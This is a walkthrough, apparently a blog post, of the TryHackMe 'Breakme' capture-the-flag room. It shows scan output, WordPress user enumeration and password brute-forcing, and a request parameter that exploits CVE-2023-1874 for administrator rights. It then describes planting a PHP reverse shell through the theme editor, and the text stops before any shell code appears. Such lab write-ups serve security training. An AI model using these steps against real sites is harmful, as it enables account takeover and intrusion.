# Breakme

{% embed url="<https://tryhackme.com/r/room/breakmenu>" %}

## Recon

Let's start with a nmap scan.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~]
└─$ nmap breakme.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:14 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,80 breakme.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:21 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8e:4f:77:7f:f6:aa:6a:dc:17:c9:bf:5a:2b:eb:8c:41 (RSA)
|   256 a3:9c:66:73:fc:b9:23:c0:0f:da:1d:c9:84:d6:b1:4a (ECDSA)
|_  256 6d:c2:0e:89:25:55:10:a9:9e:41:6e:0d:81:9a:17:cb (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
```

{% endcode %}

We use Feroxbuster for a directory scan. The `/wordpress` hits make it evident that the web server is hosting WordPress.

```bash
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://breakme.thm/ -w /usr/share/wordlists/dirb/big.txt 
                                                                                                                                                                                                                                            
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://breakme.thm/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       24l      126w    10355c http://breakme.thm/icons/openlogo-75.png
200      GET      368l      933w    10701c http://breakme.thm/
301      GET        9l       28w      311c http://breakme.thm/manual => http://breakme.thm/manual/
301      GET        9l       28w      314c http://breakme.thm/manual/da => http://breakme.thm/manual/da/
301      GET        9l       28w      314c http://breakme.thm/manual/en => http://breakme.thm/manual/en/
301      GET        9l       28w      314c http://breakme.thm/manual/de => http://breakme.thm/manual/de/
301      GET        9l       28w      314c http://breakme.thm/manual/es => http://breakme.thm/manual/es/
301      GET        9l       28w      318c http://breakme.thm/manual/images => http://breakme.thm/manual/images/
200      GET        3l       26w     3083c http://breakme.thm/manual/images/mod_rewrite_fig1.png
200      GET        1l        5w       87c http://breakme.thm/manual/images/right.gif
200      GET       10l       34w     2420c http://breakme.thm/manual/images/mod_rewrite_fig2.png
200      GET       18l      118w     6536c http://breakme.thm/manual/images/feather.gif
200      GET        1l        5w       84c http://breakme.thm/manual/images/down.gif
200      GET       14l       54w     2412c http://breakme.thm/manual/images/index.gif
200      GET       25l       87w     6358c http://breakme.thm/manual/images/mod_rewrite_fig1.gif
200      GET       16l       74w     5983c http://breakme.thm/manual/images/ssl_intro_fig1.png
200      GET        8l       24w     1868c http://breakme.thm/manual/images/mod_filter_new.png
200      GET       26l      111w    10616c http://breakme.thm/manual/images/ssl_intro_fig1.gif
200      GET       50l      355w    31098c http://breakme.thm/manual/images/custom_errordocs.png
200      GET      105l      493w    29291c http://breakme.thm/manual/images/caching_fig1.gif
301      GET        9l       28w      314c http://breakme.thm/manual/fr => http://breakme.thm/manual/fr/
200      GET      158l     1179w    92140c http://breakme.thm/manual/images/build_a_mod_3.png
200      GET      931l     5534w   463351c http://breakme.thm/manual/images/bal-man.png
301      GET        9l       28w      314c http://breakme.thm/manual/ja => http://breakme.thm/manual/ja/
301      GET        9l       28w      314c http://breakme.thm/manual/ko => http://breakme.thm/manual/ko/
301      GET        9l       28w      324c http://breakme.thm/manual/da/developer => http://breakme.thm/manual/da/developer/
301      GET        9l       28w      318c http://breakme.thm/manual/da/faq => http://breakme.thm/manual/da/faq/
301      GET        9l       28w      324c http://breakme.thm/manual/en/developer => http://breakme.thm/manual/en/developer/
301      GET        9l       28w      324c http://breakme.thm/manual/de/developer => http://breakme.thm/manual/de/developer/
301      GET        9l       28w      324c http://breakme.thm/manual/es/developer => http://breakme.thm/manual/es/developer/
301      GET        9l       28w      317c http://breakme.thm/manual/pt-br => http://breakme.thm/manual/pt-br/
301      GET        9l       28w      320c http://breakme.thm/manual/da/howto => http://breakme.thm/manual/da/howto/
301      GET        9l       28w      324c http://breakme.thm/manual/ja/developer => http://breakme.thm/manual/ja/developer/
301      GET        9l       28w      314c http://breakme.thm/manual/ru => http://breakme.thm/manual/ru/
301      GET        9l       28w      318c http://breakme.thm/manual/es/faq => http://breakme.thm/manual/es/faq/
301      GET        9l       28w      318c http://breakme.thm/manual/de/faq => http://breakme.thm/manual/de/faq/
301      GET        9l       28w      317c http://breakme.thm/manual/style => http://breakme.thm/manual/style/
200      GET       42l      190w     1425c http://breakme.thm/manual/style/sitemap.dtd
200      GET       24l      127w      907c http://breakme.thm/manual/style/lang.dtd
301      GET        9l       28w      320c http://breakme.thm/manual/en/howto => http://breakme.thm/manual/en/howto/
200      GET     1622l     6889w    73959c http://breakme.thm/manual/style/scripts/prettify.js
200      GET        5l       21w      167c http://breakme.thm/manual/style/scripts/MINIFY
301      GET        9l       28w      320c http://breakme.thm/manual/es/howto => http://breakme.thm/manual/es/howto/
301      GET        9l       28w      320c http://breakme.thm/manual/de/howto => http://breakme.thm/manual/de/howto/
301      GET        9l       28w      314c http://breakme.thm/manual/tr => http://breakme.thm/manual/tr/
301      GET        9l       28w      314c http://breakme.thm/wordpress => http://breakme.thm/wordpress/
301      GET        9l       28w      324c http://breakme.thm/manual/ko/developer => http://breakme.thm/manual/ko/developer/
301      GET        9l       28w      319c http://breakme.thm/manual/da/misc => http://breakme.thm/manual/da/misc/
301      GET        9l       28w      320c http://breakme.thm/manual/ja/howto => http://breakme.thm/manual/ja/howto/
301      GET        9l       28w      318c http://breakme.thm/manual/da/mod => http://breakme.thm/manual/da/mod/
301      GET        9l       28w      318c http://breakme.thm/manual/ko/faq => http://breakme.thm/manual/ko/faq/
301      GET        9l       28w      320c http://breakme.thm/manual/fr/howto => http://breakme.thm/manual/fr/howto/
301      GET        9l       28w      317c http://breakme.thm/manual/zh-cn => http://breakme.thm/manual/zh-cn/
301      GET        9l       28w      319c http://breakme.thm/manual/en/misc => http://breakme.thm/manual/en/misc/
301      GET        9l       28w      319c http://breakme.thm/manual/es/misc => http://breakme.thm/manual/es/misc/
301      GET        9l       28w      318c http://breakme.thm/manual/en/mod => http://breakme.thm/manual/en/mod/
301      GET        9l       28w      323c http://breakme.thm/manual/da/platform => http://breakme.thm/manual/da/platform/
301      GET        9l       28w      323c http://breakme.thm/manual/da/programs => http://breakme.thm/manual/da/programs/
301      GET        9l       28w      319c http://breakme.thm/manual/de/misc => http://breakme.thm/manual/de/misc/
301      GET        9l       28w      318c http://breakme.thm/manual/es/mod => http://breakme.thm/manual/es/mod/
301      GET        9l       28w      321c http://breakme.thm/manual/es/vhosts => http://breakme.thm/manual/es/vhosts/
301      GET        9l       28w      324c http://breakme.thm/manual/tr/developer => http://breakme.thm/manual/tr/developer/
301      GET        9l       28w      325c http://breakme.thm/wordpress/wp-content => http://breakme.thm/wordpress/wp-content/
301      GET        9l       28w      323c http://breakme.thm/wordpress/wp-admin => http://breakme.thm/wordpress/wp-admin/
301      GET        9l       28w      326c http://breakme.thm/wordpress/wp-includes => http://breakme.thm/wordpress/wp-includes/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/assets => http://breakme.thm/wordpress/wp-includes/assets/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/blocks => http://breakme.thm/wordpress/wp-includes/blocks/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/certificates => http://breakme.thm/wordpress/wp-includes/certificates/
301      GET        9l       28w      327c http://breakme.thm/wordpress/wp-admin/css => http://breakme.thm/wordpress/wp-admin/css/
301      GET        9l       28w      330c http://breakme.thm/wordpress/wp-includes/css => http://breakme.thm/wordpress/wp-includes/css/
301      GET        9l       28w      336c http://breakme.thm/wordpress/wp-includes/customize => http://breakme.thm/wordpress/wp-includes/customize/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/audio => http://breakme.thm/wordpress/wp-includes/blocks/audio/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/archives => http://breakme.thm/wordpress/wp-includes/blocks/archives/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/avatar => http://breakme.thm/wordpress/wp-includes/blocks/avatar/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/button => http://breakme.thm/wordpress/wp-includes/blocks/button/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/buttons => http://breakme.thm/wordpress/wp-includes/blocks/buttons/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/calendar => http://breakme.thm/wordpress/wp-includes/blocks/calendar/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/block => http://breakme.thm/wordpress/wp-includes/blocks/block/
301      GET        9l       28w      344c http://breakme.thm/wordpress/wp-includes/blocks/categories => http://breakme.thm/wordpress/wp-includes/blocks/categories/
301      GET        9l       28w      330c http://breakme.thm/wordpress/wp-admin/images => http://breakme.thm/wordpress/wp-admin/images/
301      GET        9l       28w      326c http://breakme.thm/wordpress/wp-admin/js => http://breakme.thm/wordpress/wp-admin/js/
301      GET        9l       28w      332c http://breakme.thm/wordpress/wp-admin/includes => http://breakme.thm/wordpress/wp-admin/includes/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/code => http://breakme.thm/wordpress/wp-includes/blocks/code/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/images => http://breakme.thm/wordpress/wp-includes/images/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/column => http://breakme.thm/wordpress/wp-includes/blocks/column/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/comments => http://breakme.thm/wordpress/wp-includes/blocks/comments/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/columns => http://breakme.thm/wordpress/wp-includes/blocks/columns/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/cover => http://breakme.thm/wordpress/wp-includes/blocks/cover/
301      GET        9l       28w      329c http://breakme.thm/wordpress/wp-includes/js => http://breakme.thm/wordpress/wp-includes/js/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/details => http://breakme.thm/wordpress/wp-includes/blocks/details/
301      GET        9l       28w      329c http://breakme.thm/wordpress/wp-admin/maint => http://breakme.thm/wordpress/wp-admin/maint/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/embed => http://breakme.thm/wordpress/wp-includes/blocks/embed/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-admin/css/colors => http://breakme.thm/wordpress/wp-admin/css/colors/
301      GET        9l       28w      331c http://breakme.thm/wordpress/wp-admin/network => http://breakme.thm/wordpress/wp-admin/network/
301      GET        9l       28w      335c http://breakme.thm/wordpress/wp-includes/css/dist => http://breakme.thm/wordpress/wp-includes/css/dist/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/file => http://breakme.thm/wordpress/wp-includes/blocks/file/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/gallery => http://breakme.thm/wordpress/wp-includes/blocks/gallery/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/group => http://breakme.thm/wordpress/wp-includes/blocks/group/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/heading => http://breakme.thm/wordpress/wp-includes/blocks/heading/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/html => http://breakme.thm/wordpress/wp-includes/blocks/html/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/image => http://breakme.thm/wordpress/wp-includes/blocks/image/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-content/plugins => http://breakme.thm/wordpress/wp-content/plugins/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/list => http://breakme.thm/wordpress/wp-includes/blocks/list/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/images/crystal => http://breakme.thm/wordpress/wp-includes/images/crystal/
301      GET        9l       28w      335c http://breakme.thm/wordpress/wp-includes/sitemaps => http://breakme.thm/wordpress/wp-includes/sitemaps/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-includes/js/dist => http://breakme.thm/wordpress/wp-includes/js/dist/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-includes/js/crop => http://breakme.thm/wordpress/wp-includes/js/crop/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/missing => http://breakme.thm/wordpress/wp-includes/blocks/missing/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/more => http://breakme.thm/wordpress/wp-includes/blocks/more/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-content/plugins/akismet => http://breakme.thm/wordpress/wp-content/plugins/akismet/
301      GET        9l       28w      328c http://breakme.thm/wordpress/wp-admin/user => http://breakme.thm/wordpress/wp-admin/user/
301      GET        9l       28w      344c http://breakme.thm/wordpress/wp-includes/blocks/navigation => http://breakme.thm/wordpress/wp-includes/blocks/navigation/
301      GET        9l       28w      332c http://breakme.thm/wordpress/wp-content/themes => http://breakme.thm/wordpress/wp-content/themes/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/query => http://breakme.thm/wordpress/wp-includes/blocks/query/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/spacer => http://breakme.thm/wordpress/wp-includes/blocks/spacer/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/images/smilies => http://breakme.thm/wordpress/wp-includes/images/smilies/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/js/swfupload => http://breakme.thm/wordpress/wp-includes/js/swfupload/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/js/thickbox => http://breakme.thm/wordpress/wp-includes/js/thickbox/
301      GET        9l       28w      337c http://breakme.thm/wordpress/wp-includes/js/tinymce => http://breakme.thm/wordpress/wp-includes/js/tinymce/
301      GET        9l       28w      345c http://breakme.thm/wordpress/wp-includes/sitemaps/providers => http://breakme.thm/wordpress/wp-includes/sitemaps/providers/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-admin/js/widgets => http://breakme.thm/wordpress/wp-admin/js/widgets/

```

Visiting the index page, we are just greeted with an Apache2 Debian default page.

![](/files/qw8S7WPwg6px9sqmxg2a)

We visit the WordPress site and discover that it is a straightforward blog.

{% code overflow="wrap" fullWidth="false" %}

```
http://breakme.thm/wordpress/
```

{% endcode %}

<figure><img src="/files/GcjmoeLlgV5aMsw6reiJ" alt=""><figcaption></figcaption></figure>

We seem to be in the right place: `http://breakme.thm/wordpress/index.php/breakme/`.

<figure><img src="/files/IgL9GaeOv4oEwD4exZeH" alt=""><figcaption></figcaption></figure>

Next, we use WPScan to analyze the WordPress application. It reveals that the site is running version 6.4.3, which contains a vulnerability allowing user enumeration.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/                                                          
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:17:29 2024
.
.
.
.
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |  - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>

[+] WordPress theme in use: twentytwentyfour
 | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
```

{% endcode %}

## Initial Access

We continue focusing on the WordPress site and run additional WPScan assessments to extract more useful information. These scans help identify potential vulnerabilities that could be exploited.

### WPScan Part I - Enum Credentials

We begin by attempting to enumerate existing users on the WordPress site. Through this process, we successfully identify two users: `bob` and `admin`.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:29:14 2024
.
.
.
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://breakme.thm/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bob
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

{% endcode %}

Next, we proceed to brute-force the passwords for both users. We manage to successfully crack the password for user `bob`.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/ -U admin,bob -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:31:09 2024
.
.
.
.
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - bob / soccer                                                                                                                                                                                                                    
^Cying admin / 121589 Time: 00:20:10 <                                                                                                                                                            > (18419 / 28688814)  0.06%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: bob, Password: [REDACTED]
```

{% endcode %}

A link in the sample page `http://breakme.thm/wordpress/index.php/sample-page` takes us to the login window.

<figure><img src="/files/wbbVo98jk9fGvVUEtjTD" alt=""><figcaption></figcaption></figure>

We log in using the discovered credentials but realize that the account doesn't have elevated privileges. The admin dashboard is not visible, indicating this user has limited permissions.

<figure><img src="/files/v2rBYbpiX11C5Ez9JB7W" alt=""><figcaption></figcaption></figure>

We can edit our own profile and make only minor adjustments on the dashboard.

<figure><img src="/files/aLXJ20lSeGXsBP8cGSNt" alt=""><figcaption></figcaption></figure>

### WPScan Part II - Further Enumeration (WPScan API Key)

It looks like we haven't discovered everything yet. Next we run another WPScan, this time with an API key.

A key can be obtained free of charge by registering on the WPScan website. With it, the scan results are matched against known CVEs.

We run the WPScan using the API key and discover an interesting finding that belongs to `CVE-2023-1874`, which is WP Data Access <= 5.3.7 - Authenticated (Subscriber+) Privilege Escalation.

```bash
┌──(kali㉿kali)-[~]
└─$ export  WPSCAN_API_TOKEN=[REDACTED]
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/                                                 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:53:11 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.56 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://breakme.thm/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://breakme.thm/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://breakme.thm/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |  - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.4.4
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/

[+] WordPress theme in use: twentytwentyfour
 | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-data-access
 | Location: http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/
 | Last Updated: 2024-09-18T00:01:00.000Z
 | [!] The version is out of date, the latest version is 5.5.14
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 3 vulnerabilities identified:
 |
 | [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
 |     Fixed in: 5.3.8
 |     References:
 |      - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874
 |      - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
 |
 | [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
 |
 | [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
 |     Fixed in: 5.5.9
 |     References:
 |      - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd
 |
 | Version: 5.3.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Mon Oct  7 12:53:26 2024
[+] Requests Done: 176
[+] Cached Requests: 5
[+] Data Sent: 47.983 KB
[+] Data Received: 311.351 KB
[+] Memory used: 273.23 MB
[+] Elapsed time: 00:00:14
```

We can find out more about the vulnerability in the following post:

{% embed url="<https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/>" %}

First we open our profile page and submit a normal profile update.

<figure><img src="/files/1uMDvQcqZ3W92aHOYqZ2" alt=""><figcaption></figcaption></figure>

We submit the request and intercept it via Burp Suite. We must now add the following parameter, which is not already set.

`&wpda_role[]=administrator`

This assigns us the administrator role. The parameter has to be exact: if it is malformed, we risk locking ourselves out of the dashboard and needing a machine reset to get back in.

<figure><img src="/files/oHsyuOaxlQMTWyix8MTi" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8IdyqaMZJa3W2THLp5g1" alt=""><figcaption></figcaption></figure>

### Reverse Shell

To establish a foothold, we use our new administrator rights to get code execution through the theme editor, as described on HackTricks: we generate a PHP reverse shell (the Pentest Monkey variant from `revshells.com`), paste it into a theme template, and start a listener before triggering the page.

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#panel-rce>" %}

<figure><img src="/files/OCDmoD0OZlYYuak0iByB" alt=""><figcaption></figcaption></figure>

Next, we open the theme editor to replace a template with the reverse shell:

```
